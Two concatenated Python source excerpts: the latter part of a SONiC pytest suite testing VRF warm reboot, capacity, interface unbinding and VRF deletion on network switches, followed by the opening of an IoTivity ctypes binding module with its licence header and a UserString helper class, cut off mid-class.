        assert wait_until(300, 20, 0, check_interface_status, duthost, up_ports), \
            "All interfaces should be up!"

    def test_vrf_system_warm_reboot(self, duthosts, rand_one_dut_hostname, localhost, cfg_facts, partial_ptf_runner):
        """Warm-reboot the whole system while traffic runs in background."""
        duthost = duthosts[rand_one_dut_hostname]
        # Exceptions from the traffic thread are passed back through this queue.
        exc_que = Queue.Queue()
        params = {
            'ptf_runner': partial_ptf_runner,
            'exc_queue': exc_que,  # use for store exception infos
            'testname': 'vrf_test.FibTest',
            'fib_info_files': ["/tmp/vrf1_fib.txt"],
            'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
        }
        traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
        # send background traffic
        traffic_in_bg.start()
        logger.info("Start transmiting packets...")
        # start system warm-reboot
        logger.info("Warm reboot ...")
        reboot(duthost, localhost, reboot_type="warm")
        # wait until background traffic finished
        traffic_in_bg.join()
        logger.info("Transmit done.")
        passed = True
        if exc_que.qsize() != 0:
            passed = False
            exc_type, exc_obj, exc_trace = exc_que.get()
        assert passed == True, "Test Failed: \n Exception infos => {}".format(str(exc_obj))
        # wait until components finish reconcile
        comp_list = ['orchagent', 'neighsyncd', 'bgp']
        tbd_comp_list = finalize_warmboot(duthost, comp_list=comp_list)
        assert len(tbd_comp_list) == 0, "Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
        # basic check after warm reboot
        assert wait_until(300, 20, 0, duthost.critical_services_fully_started), "Not all critical services are fully started"
        up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
        assert wait_until(300, 20, 0, check_interface_status, duthost, up_ports), "Not all interfaces are up"
class TestVrfCapacity():
    """Scale test: create close to VRF_CAPACITY VRFs (two VLAN RIFs and one
    static route each) and verify ping/forwarding on a random sample."""

    VRF_CAPACITY = 1000

    # limit the number of vrfs to be covered to limit script execution time
    TEST_COUNT = 100

    # Base VLAN ids for the source-side and destination-side sub-interfaces.
    src_base_vid = 2000
    dst_base_vid = 3000

    # Base subnets; consecutive /31-style pairs are carved out per VRF.
    ipnet1 = IPNetwork("192.1.1.0/31")
    ipnet2 = IPNetwork("192.2.1.0/31")

    vrf_name_tpl = "Vrf_cap_{}"
    sub_if_name_tpl = "e{}.v{}"  # should not include 'eth'

    # Prefix each per-VRF static route points at.
    route_prefix = "200.200.200.0/24"

    # Teardown strategy: 'reboot' (fast, wipes everything) or 'remove' (step-by-step).
    cleanup_method = 'reboot'

    @pytest.fixture(scope="class")
    def vrf_count(self, request):
        vrf_capacity = request.config.option.vrf_capacity or self.VRF_CAPACITY  # get cmd line option value, use default if none
        return vrf_capacity - 3  # minus global(default) VRF and Vrf1/Vrf2

    @pytest.fixture(scope="class")
    def random_vrf_list(self, vrf_count, request):
        test_count = request.config.option.vrf_test_count or self.TEST_COUNT  # get cmd line option value, use default if none
        return sorted(random.sample(xrange(1, vrf_count+1), min(test_count, vrf_count)))

    @pytest.fixture(scope="class", autouse=True)
    def setup_vrf_capacity(self, duthosts, rand_one_dut_hostname, ptfhost, localhost, cfg_facts, vrf_count, random_vrf_list, request):
        """
        Setup $VRF_CAPACITY (minus global VRF and Vrf1/Vrf2) vrfs:
          - 2 vlan interfaces per vrf,
          - 1 ip address per vlan interface,
          - 1 static route per vrf that sends $route_prefix (200.200.200.0/24)
            to vlan_2's neighbor ip,
          - the 2nd member port of Vlan1000/2000 is used as trunk port.

        Example:
          VRF        RIFs      Vlan_Member_Port  IP            Neighbor_IP(on PTF)  Static_Route
          Vrf_Cap_1  Vlan2001  Ethernet2         192.1.1.0/31  192.1.1.1/31         ip route 200.200.200.0/24 192.2.1.1 vrf Vrf_Cap_1
                     Vlan3001  Ethernet14        192.2.1.0/31  192.2.1.1/31
          Vrf_Cap_2  Vlan2002  Ethernet2         192.1.1.2/31  192.1.1.3/31         ip route 200.200.200.0/24 192.2.1.3 vrf Vrf_Cap_2
                     Vlan3002  Ethernet14        192.2.1.2/31  192.2.1.3/31
          ...
        """
        duthost = duthosts[rand_one_dut_hostname]
        # -------- Setup ----------
        duthost.shell("logger -p INFO -- '-------- {} start!!! ---------'".format(request.cls.__name__))
        # increase ipv4 neigh threshold to 2k
        duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=2048")
        # use 2rd member port of Vlan1000/Vlan2000 as trunk port
        dut_port1 = get_vlan_members('Vlan1000', cfg_facts)[1]
        dut_port2 = get_vlan_members('Vlan2000', cfg_facts)[1]
        ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
        ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
        # base ip range to be assigned to vlan rif
        ip1 = self.ipnet1
        ip2 = self.ipnet2
        # setup $vrf_count vrfs on dut
        dut_extra_vars = {
            'vrf_count': vrf_count,
            'src_base_vid': self.src_base_vid,
            'dst_base_vid': self.dst_base_vid,
            'vrf_name_tpl': self.vrf_name_tpl,
            'ip1': ip1,
            'ip2': ip2,
            'dut_port1': dut_port1,
            'dut_port2': dut_port2,
            'route_prefix': self.route_prefix,
            'op_code': 'add'
        }
        duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
        # Apply the config in stages (vlan -> member -> vrf -> intfs); each
        # stage gets a settle time sized for the worst-case removal cost.
        cfg_attrs_map = OrderedDict()
        # In wrost case(1k vrfs, 2k rifs), remove a vlan could take 60~80ms
        # ("VlanMgr::removeHostVlan ip link del Vlan{{vlan_id}} && bridge vlan del vid {{vlan_id}} dev Bridge self" take most of the time)
        # So wait up to 5(s) + 80(ms) * 2(vlans per vrf) * vrf_count when remove vlans
        cfg_attrs_map['vlan'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.08 * 2 * vrf_count}
        # In wrost case(1k vrfs, 2k rifs), remove a vlan member from vlan could take 160~220ms
        # ("vlanmgrd::removeHostVlanMember /sbin/bridge vlan show dev <devname>" take most of the time)
        # So wait up to 5(s) + 220(ms) * 2(2 vlan members per vrf) * vrf_count
        cfg_attrs_map['vlan_member'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.2 * 2 * vrf_count}
        # In wrost case(1k vrfs, 2k rifs), remove a vrf could take 6~10ms
        # So wait up to 5(s) + 10(ms) * vrf_count when remove vrfs
        cfg_attrs_map['vrf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.01 * vrf_count}
        # In wrost case(1k vrfs, 2k rifs), remove a rif could take 30~40ms
        # ("IntfMgr::getIntfIpCount ip address show <alias> master <vrfName>" take most of the time)
        # So wait up to 5(s) + 40(ms) * 2(rifs per vrf) * vrf_count when remove rifs
        cfg_attrs_map['vrf_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.04 * 2 * vrf_count}
        cfg_attrs_map['vlan_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5}
        for cfg_name, attrs in cfg_attrs_map.iteritems():
            src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
            render_file = '/tmp/vrf_capacity_{}_cfg.json'.format(cfg_name)
            duthost.template(src=src_template, dest=render_file)
            duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
            time.sleep(attrs['add_sleep_time'])
        # setup static routes
        duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
        duthost.shell("/tmp/vrf_capacity_route_cfg.sh")
        # setup peer ip addresses on ptf
        ptf_extra_vars = {
            'vrf_count': vrf_count,
            'src_base_vid': self.src_base_vid,
            'dst_base_vid': self.dst_base_vid,
            'sub_if_name_tpl': self.sub_if_name_tpl,
            'ip1': ip1,
            'ip2': ip2,
            'ptf_port1': ptf_port1,
            'ptf_port2': ptf_port2,
            'random_vrf_list': random_vrf_list
        }
        ptfhost.host.options['variable_manager'].extra_vars.update(ptf_extra_vars)
        ptfhost.template(src='vrf/vrf_capacity_ptf_cfg.j2', dest='/tmp/vrf_capacity_ptf_cfg.sh', mode="0755")
        ptfhost.shell('/tmp/vrf_capacity_ptf_cfg.sh')
        # ping to trigger neigh resolving, also acitvate the static routes
        dut_extra_vars.update({
            'random_vrf_list': random_vrf_list,
            'count': 1,
            'timeout': 1
        })
        duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
        duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_neigh_learning.sh', mode="0755")
        duthost.shell('/tmp/vrf_capacity_neigh_learning.sh', module_ignore_errors=True)
        # wait for route/neigh entries apply to asic
        time.sleep(5)
        # -------- Testing ----------
        yield
        # -------- Teardown ----------
        # remove cfg on ptf
        ptfhost.shell("ip address flush dev eth{}".format(ptf_port1))
        ptfhost.shell("ip address flush dev eth{}".format(ptf_port2))
        ptfhost.template(src='vrf/vrf_capacity_del_ptf_cfg.j2', dest='/tmp/vrf_capacity_del_ptf_cfg.sh', mode="0755")
        ptfhost.shell('/tmp/vrf_capacity_del_ptf_cfg.sh')
        duthost.shell("config interface startup {}".format(dut_port1))
        duthost.shell("config interface startup {}".format(dut_port2))
        # remove cfg on dut
        if self.cleanup_method == 'reboot':
            reboot(duthost, localhost)
        else:
            duthost.shell("config interface shutdown {}".format(dut_port1))
            duthost.shell("config interface shutdown {}".format(dut_port2))
            # flush macs, arps and neighbors
            duthost.shell("sonic-clear arp")
            duthost.shell("sonic-clear fdb all")
            # remove static routes
            dut_extra_vars['op_code'] = 'del'
            duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
            duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
            duthost.shell('/tmp/vrf_capacity_route_cfg.sh')
            # remove ip addr, intf, vrf, vlan member, vlan cfgs
            for cfg_name, attrs in reversed(cfg_attrs_map.items()):
                src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
                render_file = '/tmp/vrf_capacity_del_{}_cfg.json'.format(cfg_name)
                duthost.template(src=src_template, dest=render_file)
                duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
                time.sleep(attrs['remove_sleep_time'])
        duthost.shell("logger -p INFO -- '-------- {} end!!! ---------'".format(request.cls.__name__))

    def test_ping(self, duthosts, rand_one_dut_hostname, random_vrf_list):
        """Ping the PTF peer address from the DUT inside each sampled VRF."""
        duthost = duthosts[rand_one_dut_hostname]
        dut_extra_vars = {
            'vrf_name_tpl': self.vrf_name_tpl,
            'random_vrf_list': random_vrf_list,
            'ip1': self.ipnet1,
            'ip2': self.ipnet2
        }
        duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
        duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_ping.sh', mode="0755")
        duthost.shell('/tmp/vrf_capacity_ping.sh')

    def test_ip_fwd(self, partial_ptf_runner, random_vrf_list, ptfhost):
        """Forwarding via the per-VRF static route must work for sampled VRFs."""
        ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
        ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
        dst_ips = [str(IPNetwork(self.route_prefix)[1])]
        gen_specific_neigh_file(dst_ips, [[ptf_port2]], '/tmp/vrf_capability_fwd.txt', ptfhost)
        partial_ptf_runner(
            testname="vrf_test.CapTest",
            src_ports=[ptf_port1],
            fib_info_files=['/tmp/vrf_capability_fwd.txt'],
            random_vrf_list=random_vrf_list,
            src_base_vid=self.src_base_vid,
            dst_base_vid=self.dst_base_vid
        )
class TestVrfUnbindIntf():
    """Verify ip/neigh/route cleanup after PortChannel0001 is unbound from Vrf1,
    and recovery after it is rebound."""

    c_vars = {
        'rebind_intf': True  # rebind interface during teardown stage
    }

    @pytest.fixture(scope="class", autouse=True)
    def setup_vrf_unbindintf(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
        """Unbind PortChannel0001 from its vrf for the whole class; rebind on teardown."""
        duthost = duthosts[rand_one_dut_hostname]
        # -------- Setup ----------
        duthost.shell("config interface vrf unbind PortChannel0001")
        # wait for neigh/route flush
        time.sleep(5)
        # -------- Testing ----------
        yield
        # -------- Teardown ----------
        if self.c_vars['rebind_intf']:
            self.rebind_intf(duthost)
            wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts)

    def rebind_intf(self, duthost):
        """Re-bind PortChannel0001 to Vrf1 and restore its ip addresses."""
        duthost.shell("config interface vrf bind PortChannel0001 Vrf1")
        # .iteritems() is Python2-only; .items() is behaviorally identical here
        # and keeps the test runnable under Python3.
        for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].items():
            for ip in ips:
                duthost.shell("config interface ip add PortChannel0001 {}".format(ip))

    @pytest.fixture(scope='class')
    def setup_vrf_rebind_intf(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """Rebind PortChannel0001 early for the *_after_rebind tests."""
        duthost = duthosts[rand_one_dut_hostname]
        self.rebind_intf(duthost)
        self.c_vars['rebind_intf'] = False  # Mark to skip rebind interface during teardown
        # check bgp session state after rebind
        assert wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts), \
            "Bgp sessions should be re-established after Portchannel0001 rebind to Vrf"

    def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
        duthost = duthosts[rand_one_dut_hostname]
        ip_addr_show = duthost.shell("ip addr show PortChannel0001")['stdout']
        for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].items():
            for ip in ips:
                assert str(ip) not in ip_addr_show, "The ip addresses on PortChannel0001 should be flushed after unbind from vrf."

    def test_pc1_neigh_flushed(self, duthosts, rand_one_dut_hostname):
        duthost = duthosts[rand_one_dut_hostname]
        # verify ipv4
        show_arp = duthost.shell("show arp")['stdout']
        assert 'PortChannel0001' not in show_arp, "The arps on PortChannel0001 should be flushed after unbind from vrf."
        # FIXME
        # ipv6 neighbors do not seem to be flushed by kernel whenever remove ipv6 addresses
        # from interface. So comment out the test of ipv6 neigh flushed.
        # # verify ipv6
        # show_ndp = duthost.shell("show ndp")['stdout']
        # assert 'PortChannel0001' not in show_ndp, "The neighbors on PortChannel0001 should be flushed after unbind from vrf."

    def test_pc1_neigh_flushed_by_traffic(self, partial_ptf_runner, ptfhost):
        pc1_neigh_ips = []
        for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].items():
            for ip in ips:
                pc1_neigh_ips.append(str(ip.ip+1))
        gen_specific_neigh_file(pc1_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0001']],
                                '/tmp/unbindvrf_neigh_1.txt', ptfhost)
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            pkt_action='drop',
            fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
            ipv4=True,
            ipv6=False
        )

    def test_pc1_routes_flushed(self, ptfhost, tbinfo, partial_ptf_runner):
        gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
                         dst_intfs=['PortChannel0001'],
                         render_file="/tmp/unbindvrf_fib_1.txt")
        # Send packet from downlink to uplink, port channel1 should no longer receive any packets
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            pkt_action='drop',
            fib_info_files=["/tmp/unbindvrf_fib_1.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
        )

    def test_pc2_neigh(self, partial_ptf_runner, ptfhost):
        pc2_neigh_ips = []
        for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0002'].items():
            for ip in ips:
                pc2_neigh_ips.append(str(ip.ip+1))
        gen_specific_neigh_file(pc2_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0002']],
                                '/tmp/unbindvrf_neigh_2.txt', ptfhost)
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            pkt_action='fwd',
            fib_info_files=['/tmp/unbindvrf_neigh_2.txt'],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
        )

    def test_pc2_fib(self, ptfhost, tbinfo, partial_ptf_runner):
        gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
                         dst_intfs=['PortChannel0002'],
                         render_file="/tmp/unbindvrf_fib_2.txt")
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            fib_info_files=["/tmp/unbindvrf_fib_2.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
        )

    @pytest.mark.usefixtures('setup_vrf_rebind_intf')
    def test_pc1_neigh_after_rebind(self, partial_ptf_runner):
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            pkt_action='fwd',
            fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
            ipv4=True,
            ipv6=False
        )

    @pytest.mark.usefixtures('setup_vrf_rebind_intf')
    def test_vrf1_fib_after_rebind(self, ptfhost, tbinfo, partial_ptf_runner):
        gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
                         render_file='/tmp/rebindvrf_vrf1_fib.txt')
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            fib_info_files=["/tmp/rebindvrf_vrf1_fib.txt"],
            src_ports=g_vars['vrf_member_port_indices']['Vrf1']
        )
class TestVrfDeletion():
    """Verify ip/neigh/route cleanup when Vrf1 is deleted, and recovery on restore."""

    c_vars = {
        'restore_vrf': True
    }

    def restore_vrf(self, duthost):
        """Re-create Vrf1, rebind its interfaces and restore their ip addresses."""
        duthost.shell("config vrf add Vrf1")
        # .iteritems() is Python2-only; .items() is behaviorally identical here
        # and keeps the test runnable under Python3.
        for intf, ip_facts in g_vars['vrf_intfs']['Vrf1'].items():
            duthost.shell("config interface vrf bind %s Vrf1" % intf)
            for ver, ips in ip_facts.items():
                for ip in ips:
                    duthost.shell("config interface ip add {} {}".format(intf, ip))

    @pytest.fixture(scope="class", autouse=True)
    def setup_vrf_deletion(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
        """Snapshot fib/neigh files, delete Vrf1 for the class; restore on teardown."""
        duthost = duthosts[rand_one_dut_hostname]
        # -------- Setup ----------
        gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
                         render_file="/tmp/vrf1_fib.txt")
        gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
                         render_file="/tmp/vrf2_fib.txt")
        gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
        gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
        duthost.shell("config vrf del Vrf1")
        # -------- Testing ----------
        yield
        # -------- Teardown ----------
        if self.c_vars['restore_vrf']:
            self.restore_vrf(duthost)
            wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts)

    @pytest.fixture(scope='class')
    def setup_vrf_restore(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """Restore Vrf1 early for the *_after_restore tests."""
        duthost = duthosts[rand_one_dut_hostname]
        self.restore_vrf(duthost)
        self.c_vars['restore_vrf'] = False  # Mark to skip restore vrf during teardown
        # check bgp session state after restore
        assert wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts), \
            "Bgp sessions should be re-established after restore Vrf1"

    def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
        duthost = duthosts[rand_one_dut_hostname]
        show_interfaces = duthost.shell("show ip interfaces")['stdout']
        assert 'PortChannel0001' not in show_interfaces, "The ip addr of PortChannel0001 should be flushed after Vrf1 is deleted."

    def test_pc2_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
        duthost = duthosts[rand_one_dut_hostname]
        show_interfaces = duthost.shell("show ip interfaces")['stdout']
        assert 'PortChannel0002' not in show_interfaces, "The ip addr of PortChannel0002 should be flushed after Vrf1 is deleted."

    def test_vlan1000_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
        duthost = duthosts[rand_one_dut_hostname]
        show_interfaces = duthost.shell("show ip interfaces")['stdout']
        assert 'Vlan1000' not in show_interfaces, "The ip addr of Vlan1000 should be flushed after Vrf1 is deleted."

    def test_loopback0_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
        duthost = duthosts[rand_one_dut_hostname]
        show_interfaces = duthost.shell("show ip interfaces")['stdout']
        assert 'Loopback0' not in show_interfaces, "The ip addr of Loopback0 should be flushed after Vrf1 is deleted."

    def test_vrf1_neighs_flushed(self, duthosts, rand_one_dut_hostname):
        duthost = duthosts[rand_one_dut_hostname]
        ip_neigh_show = duthost.shell("ip neigh show vrf Vrf1", module_ignore_errors=True)['stdout']
        assert '' == ip_neigh_show, "The neighbors on Vrf1 should be flushed after Vrf1 is deleted."

    def test_vrf1_neighs_flushed_by_traffic(self, partial_ptf_runner):
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            pkt_action='drop',
            fib_info_files=["/tmp/vrf1_neigh.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
        )

    def test_vrf1_routes_flushed(self, partial_ptf_runner):
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            pkt_action='drop',
            fib_info_files=["/tmp/vrf1_fib.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
        )

    def test_vrf2_neigh(self, partial_ptf_runner):
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            fib_info_files=["/tmp/vrf2_neigh.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
        )

    def test_vrf2_fib(self, partial_ptf_runner):
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            fib_info_files=["/tmp/vrf2_fib.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
        )

    @pytest.mark.usefixtures('setup_vrf_restore')
    def test_vrf1_neigh_after_restore(self, partial_ptf_runner):
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            fib_info_files=["/tmp/vrf1_neigh.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
        )

    # Name typo ("resotre") kept: the test id is external interface for -k filters.
    @pytest.mark.usefixtures('setup_vrf_restore')
    def test_vrf1_fib_after_resotre(self, partial_ptf_runner):
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            fib_info_files=["/tmp/vrf1_fib.txt"],
            src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
        )
|
iotivity.py | #############################
#
# copyright 2021 Open Connectivity Forum, Inc. All rights reserved.
# copyright 2021 Cascoda Ltd.
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE OPEN CONNECTIVITY FORUM, INC. "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE OR
# WARRANTIES OF NON-INFRINGEMENT, ARE DISCLAIMED. IN NO EVENT SHALL THE OPEN CONNECTIVITY FORUM, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#############################
#sudo apt-get -y install python3-pip
#sudo pip3 install numpy
#
import ctypes, os, sys
from ctypes import *
import signal
import time
import os
import json
import random
import sys
import argparse
import traceback
from datetime import datetime
from time import gmtime, strftime
from sys import exit
#import jsonref
import os.path
from os import listdir
from os.path import isfile, join
from shutil import copyfile
from collections import OrderedDict
from termcolor import colored
import numpy.ctypeslib as ctl
import uuid
import threading
import time
import json
import requests
import copy
# Module-level state shared between the ctypes callbacks (invoked from the C
# iotivity-lite thread) and the Python API calls that block waiting on them.
unowned_return_list=[]
unowned_event = threading.Event()    # set when an unowned device is discovered
owned_event = threading.Event()      # set when an owned device is discovered
resource_event = threading.Event()   # set when resource discovery completes
diplomat_event = threading.Event()   # set when a diplomat callback fires
so_event = threading.Event()         # set on a streamlined-onboarding ("so_otm") event
client_event = threading.Event()     # set on client command completion
device_event = threading.Event()     # set on any device state change
resource_mutex = threading.Lock()    # held while the resource list is (re)built
# NOTE(review): the name suggests ten spaces but the literal holds one here —
# possibly mangled in transit; confirm against the upstream file.
ten_spaces = " "
# Pick an integer type whose size matches size_t so it can serve as the
# pointer-difference type (c_ptrdiff_t) for the generated bindings.
_int_types = (c_int16, c_int32)
if hasattr(ctypes, "c_int64"):
    # Some builds of ctypes apparently do not have c_int64
    # defined; it's a pretty good bet that these builds do not
    # have 64-bit pointers.
    _int_types += (c_int64,)
for t in _int_types:
    if sizeof(t) == sizeof(c_size_t):
        c_ptrdiff_t = t
del t
del _int_types
class UserString:
    """Bytes-backed string wrapper used by the generated ctypes bindings.

    Mirrors the classic ``UserString`` API so generated code can treat C
    strings uniformly; ``self.data`` always holds ``bytes``.
    (ctypesgen-style boilerplate carried over from Python 2.)
    """

    def __init__(self, seq):
        # Normalize any input (bytes, UserString, or arbitrary object) to bytes.
        if isinstance(seq, bytes):
            self.data = seq
        elif isinstance(seq, UserString):
            self.data = seq.data[:]
        else:
            self.data = str(seq).encode()

    def __bytes__(self):
        return self.data

    def __str__(self):
        return self.data.decode()

    def __repr__(self):
        return repr(self.data)

    def __int__(self):
        return int(self.data.decode())

    def __long__(self):
        # Python 2 relic; never invoked implicitly on Python 3.
        return int(self.data.decode())

    def __float__(self):
        return float(self.data.decode())

    def __complex__(self):
        return complex(self.data.decode())

    def __hash__(self):
        return hash(self.data)

    def __cmp__(self, string):
        # NOTE(review): relies on the Python2-only builtin ``cmp``; on
        # Python 3 this raises NameError if ever called explicitly
        # (Python 3 never calls __cmp__ implicitly).
        if isinstance(string, UserString):
            return cmp(self.data, string.data)
        else:
            return cmp(self.data, string)

    def __le__(self, string):
        if isinstance(string, UserString):
            return self.data <= string.data
        else:
            return self.data <= string

    def __lt__(self, string):
        if isinstance(string, UserString):
            return self.data < string.data
        else:
            return self.data < string

    def __ge__(self, string):
        if isinstance(string, UserString):
            return self.data >= string.data
        else:
            return self.data >= string

    def __gt__(self, string):
        if isinstance(string, UserString):
            return self.data > string.data
        else:
            return self.data > string

    def __eq__(self, string):
        if isinstance(string, UserString):
            return self.data == string.data
        else:
            return self.data == string

    def __ne__(self, string):
        if isinstance(string, UserString):
            return self.data != string.data
        else:
            return self.data != string

    def __contains__(self, char):
        return char in self.data

    def __len__(self):
        return len(self.data)

    def __getitem__(self, index):
        return self.__class__(self.data[index])

    def __getslice__(self, start, end):
        # Python 2 relic; Python 3 routes slicing through __getitem__.
        start = max(start, 0)
        end = max(end, 0)
        return self.__class__(self.data[start:end])

    def __add__(self, other):
        if isinstance(other, UserString):
            return self.__class__(self.data + other.data)
        elif isinstance(other, bytes):
            return self.__class__(self.data + other)
        else:
            return self.__class__(self.data + str(other).encode())

    def __radd__(self, other):
        if isinstance(other, bytes):
            return self.__class__(other + self.data)
        else:
            return self.__class__(str(other).encode() + self.data)

    def __mul__(self, n):
        return self.__class__(self.data * n)

    __rmul__ = __mul__

    def __mod__(self, args):
        return self.__class__(self.data % args)

    # the following methods are defined in alphabetical order:
    def capitalize(self):
        return self.__class__(self.data.capitalize())

    def center(self, width, *args):
        return self.__class__(self.data.center(width, *args))

    def count(self, sub, start=0, end=sys.maxsize):
        return self.data.count(sub, start, end)

    def decode(self, encoding=None, errors=None):  # XXX improve this?
        if encoding:
            if errors:
                return self.__class__(self.data.decode(encoding, errors))
            else:
                return self.__class__(self.data.decode(encoding))
        else:
            return self.__class__(self.data.decode())

    def encode(self, encoding=None, errors=None):  # XXX improve this?
        if encoding:
            if errors:
                return self.__class__(self.data.encode(encoding, errors))
            else:
                return self.__class__(self.data.encode(encoding))
        else:
            return self.__class__(self.data.encode())

    def endswith(self, suffix, start=0, end=sys.maxsize):
        return self.data.endswith(suffix, start, end)

    def expandtabs(self, tabsize=8):
        return self.__class__(self.data.expandtabs(tabsize))

    def find(self, sub, start=0, end=sys.maxsize):
        return self.data.find(sub, start, end)

    def index(self, sub, start=0, end=sys.maxsize):
        return self.data.index(sub, start, end)

    def isalpha(self):
        return self.data.isalpha()

    def isalnum(self):
        return self.data.isalnum()

    def isdecimal(self):
        return self.data.isdecimal()

    def isdigit(self):
        return self.data.isdigit()

    def islower(self):
        return self.data.islower()

    def isnumeric(self):
        return self.data.isnumeric()

    def isspace(self):
        return self.data.isspace()

    def istitle(self):
        return self.data.istitle()

    def isupper(self):
        return self.data.isupper()

    def join(self, seq):
        return self.data.join(seq)

    def ljust(self, width, *args):
        return self.__class__(self.data.ljust(width, *args))

    def lower(self):
        return self.__class__(self.data.lower())

    def lstrip(self, chars=None):
        return self.__class__(self.data.lstrip(chars))

    def partition(self, sep):
        return self.data.partition(sep)

    def replace(self, old, new, maxsplit=-1):
